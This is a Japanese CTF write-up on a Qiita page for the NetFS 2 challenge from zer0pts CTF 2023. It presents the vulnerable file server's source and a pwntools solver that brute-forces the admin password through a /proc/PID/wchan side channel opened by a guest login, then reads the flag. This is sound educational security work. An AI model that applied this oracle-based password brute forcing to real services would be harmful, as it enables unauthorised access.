0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

claustra01's Daily CTF Advent Calendar 2024

Day 20

[misc] NetFS 2 (zer0pts CTF 2023) writeup

Last updated at Posted at 2024-12-20


NetFS 1の続編。パスワードが間違っていても5秒ほど待ってから切断されるようになった。

server.py
#!/usr/bin/env python3
import multiprocessing
import os
import random
import signal
import socket
import time
import re

# Refuse to start unless the admin password file is present; this check runs
# before the file is read while building LOGIN_USERS below.
assert os.path.isfile("secret/password.txt"), "Password file not found."

# Upper bound on the number of bytes read from a file for a single request.
MAX_SIZE = 0x1000
# Username -> password table, bytes on both sides. The admin password is read
# from disk once at import time, with surrounding whitespace stripped.
LOGIN_USERS = {
    b'guest': b'guest',
    b'admin': open("secret/password.txt", "rb").read().strip()
}
# Byte substrings that may not appear anywhere in a path requested by a
# non-admin user.
PROTECTED = [b"server.py", b"secret"]

# The admin password must be non-empty and consist only of lowercase hex digits.
assert re.fullmatch(b"[0-9a-f]+", LOGIN_USERS[b'admin'])

class Timeout(object):
    """Context manager that bounds a block with a SIGALRM-based time limit.

    Entering the block arms ``signal.alarm(seconds)``; when the alarm fires,
    ``handle_timeout`` raises ``TimeoutError`` in the running code. Leaving
    the block cancels the alarm and then sleeps for a random fraction of a
    second.
    """

    def __init__(self, seconds):
        """Store the time limit in seconds; the start time is set on entry."""
        self.seconds = seconds
        self.start = None

    def handle_timeout(self, signum, frame):
        """SIGALRM handler: abort the guarded block with ``TimeoutError``."""
        raise TimeoutError('Timeout')

    def wait(self):
        """Sleep until the full time limit has elapsed since entry.

        The pending alarm is cancelled first, so no ``TimeoutError`` is raised
        while waiting. The loop polls in 0.1-second steps until ``seconds``
        have passed since ``start``, then sleeps for an additional random
        interval in [0, 1) seconds.
        """
        signal.alarm(0)
        while time.time() - self.start < self.seconds:
            time.sleep(0.1)
        time.sleep(random.random())

    def __enter__(self):
        """Install the handler, arm the alarm, and record the start time."""
        signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.seconds)
        self.start = time.time()
        return self

    def __exit__(self, _type, _value, _traceback):
        """Cancel the alarm and add random jitter before leaving the block.

        Returns None, so an exception raised inside the block keeps
        propagating after the jitter sleep.
        """
        signal.alarm(0)
        time.sleep(random.random())

class PyNetworkFS(object):
    def __init__(self, conn):
        self._conn = conn
        self._auth = False
        self._user = None

    def __del__(self):
        self._conn.close()

    @property
    def is_authenticated(self):
        return self._auth

    @property
    def is_admin(self):
        return self.is_authenticated and self._user == b'admin'

    def response(self, message):
        self._conn.send(message)

    def recvline(self):
        data = b''
        while True:
            match self._conn.recv(1):
                case b'': return None
                case b'\n': break
                case byte: data += byte
        return data

    def authenticate(self):
        """Login prompt"""
        username = password = b''
        with Timeout(5):
            # Receive username
            self.response(b"Username: ")
            username = self.recvline()
            if username is None: return

            if username in LOGIN_USERS:
                password = LOGIN_USERS[username]
            else:
                self.response(b"No such a user exists.\n")
                return

        with Timeout(5) as timer:
            # Receive password
            self.response(b"Password: ")
            i = 0
            while i < len(password):
                c = self._conn.recv(1)
                if c == b'':
                    timer.wait()
                    self.response(b"Incorrect password.\n")
                    return
                elif c != password[i:i+1]:
                    timer.wait()
                    self.response(b"Incorrect password.\n")
                    return
                i += 1

            if self._conn.recv(1) != b'\n':
                timer.wait()
                self.response(b"Incorrect password.\n")
                return

        self.response(b"Logged in.\n")
        self._auth = True
        self._user = username

    def serve(self):
        """Serve files"""
        with Timeout(30):
            while True:
                # Receive filepath
                self.response(b"File: ")
                filepath = self.recvline()
                if filepath is None: return

                # Check filepath
                if not self.is_admin and \
                   any(map(lambda name: name in filepath, PROTECTED)):
                    self.response(b"Permission denied.\n")
                    continue

                # Serve file
                try:
                    f = open(filepath, 'rb')
                except FileNotFoundError:
                    self.response(b"File not found.\n")
                    continue
                except PermissionError:
                    self.response(b"Permission denied.\n")
                    continue
                except:
                    self.response(b"System error.\n")
                    continue

                try:
                    self.response(f.read(MAX_SIZE))
                except OSError:
                    self.response(b"System error.\n")
                finally:
                    f.close()

def pynetfs_main(conn):
    """Handle one client connection: log in, then serve files if accepted.

    A timeout during login is reported to the client as a failed login; a
    timeout while serving files ends the session silently.
    """
    session = PyNetworkFS(conn)

    try:
        session.authenticate()
    except TimeoutError:
        session.response(b'Incorrect password.\n')

    # Nothing more to do for a client that did not log in.
    if not session.is_authenticated:
        return

    try:
        session.serve()
    except TimeoutError:
        pass

if __name__ == '__main__':
    # Create the listening socket with address and port reuse enabled.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    for option in (socket.SO_REUSEADDR, socket.SO_REUSEPORT):
        sock.setsockopt(socket.SOL_SOCKET, option, 1)

    print("Listening on 0.0.0.0:10022")
    sock.bind(('0.0.0.0', 10022))
    sock.listen(16)

    # Hand every accepted connection to its own worker process.
    ps = []
    while True:
        client, _peer = sock.accept()
        worker = multiprocessing.Process(target=pynetfs_main, args=(client,))
        ps.append(worker)
        worker.start()
        # The parent no longer needs its copy of the client socket.
        client.close()
        # Keep live workers; join() returns None, so finished workers are
        # reaped and dropped from the list.
        ps = [p for p in ps if p.is_alive() or p.join()]

パスワードが間違った時点で入力のreadは打ち切られてsleepするので、その違いをどうにかして取得できれば前問と同じようにブルートフォースでpasswordが求められる。

    elif c != password[i:i+1]:
        timer.wait()
        self.response(b"Incorrect password.\n")
        return
    # Timeout.wait(), quoted from server.py: called on a wrong password byte.
    def wait(self):
        # Cancel the alarm so no TimeoutError interrupts the wait.
        signal.alarm(0)
        # Sleep in 0.1 s steps until the full time limit has elapsed.
        while time.time() - self.start < self.seconds:
            time.sleep(0.1)
        # Extra random delay in [0, 1) seconds.
        time.sleep(random.random())

これはプロセスの状態を見れば分かる。具体的には、/proc/{pid}/wchanでそのプロセスが「何の待ち状態になっているのか」を確認できる。

よって、guestでログインしてどうにかしてpidを特定し、adminログイン試行のプロセスを確認することでパスワードが間違っているか否かを判断すれば良い。

現在のプロセスの情報は/proc/self/から分かる。solverはこうなる。

from pwn import *
import time

# Recover the admin password one character at a time, using the wait channel
# of the admin login process (read through a guest session) as the oracle.
host = "34.170.146.252"
port = 54172
# For a local server.py instance, use these instead:
# host = "localhost"
# port = 10022

# disable info log
context.log_level = "error"

charset = "0123456789abcdef"
# The search stops once this many characters have been recovered.
password_length = 16
password = ""

while True:
  # Try each candidate for the next position. If none is accepted (for
  # example because the PID guess was off), the outer loop retries the
  # same position.
  for candidate in charset:
    p_guest = remote(host, port)
    p_admin = None
    try:
      time.sleep(0.1)
      p_admin = remote(host, port)

      # get pid
      p_guest.sendlineafter(b"Username: ", b"guest")
      p_guest.sendlineafter(b"Password: ", b"guest")
      p_guest.sendlineafter(b"File: ", b"/proc/self/status")
      p_guest.recvuntil(b"Pid:")
      # Assumes the admin connection, opened right after the guest one,
      # was given the next PID.
      admin_pid = int(p_guest.recvline().strip().decode()) + 1

      # bruteforce: send the known prefix plus one candidate, no newline
      p_admin.recvuntil(b"Username:")
      p_admin.sendline(b"admin")
      p_admin.recvuntil(b"Password: ")
      p_admin.send((password + candidate).encode())
      time.sleep(0.1)

      p_guest.sendlineafter(b"File: ", f"/proc/{admin_pid}/wchan".encode())
      recv = p_guest.recv(10)
    finally:
      # Close both connections even if a tube call above raised.
      p_guest.close()
      if p_admin is not None:
        p_admin.close()
    time.sleep(0.1)

    # if password is incorrect, process is in "hrtimer_nanosleep"
    # else, process is in "wait_woken"
    if b"wait_woken" in recv:
      password += candidate
      print(password)
      break

  if len(password) == password_length:
    p = remote(host, port)
    try:
      p.sendlineafter(b"Username: ", b"admin")
      p.sendlineafter(b"Password: ", password.encode())
      p.sendlineafter(b"File: ", b"secret/flag.txt")
      print(p.recvline())
    finally:
      p.close()
    break

このsolverでは admin_pid を guest_pid+1 としているが、不特定多数のアクセスが飛んでくるCTF開催中のリモート環境では必ずしも admin_pid と guest_pid が連続するとは限らないので解けない(ことの方が多い)気がする。

とりあえず、AlpacaHackのリモート環境ではflagが得られた。
zer0pts{pr0cfs_1s_5uch_4_n1c3_0r4cl3_5d17c4e}

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?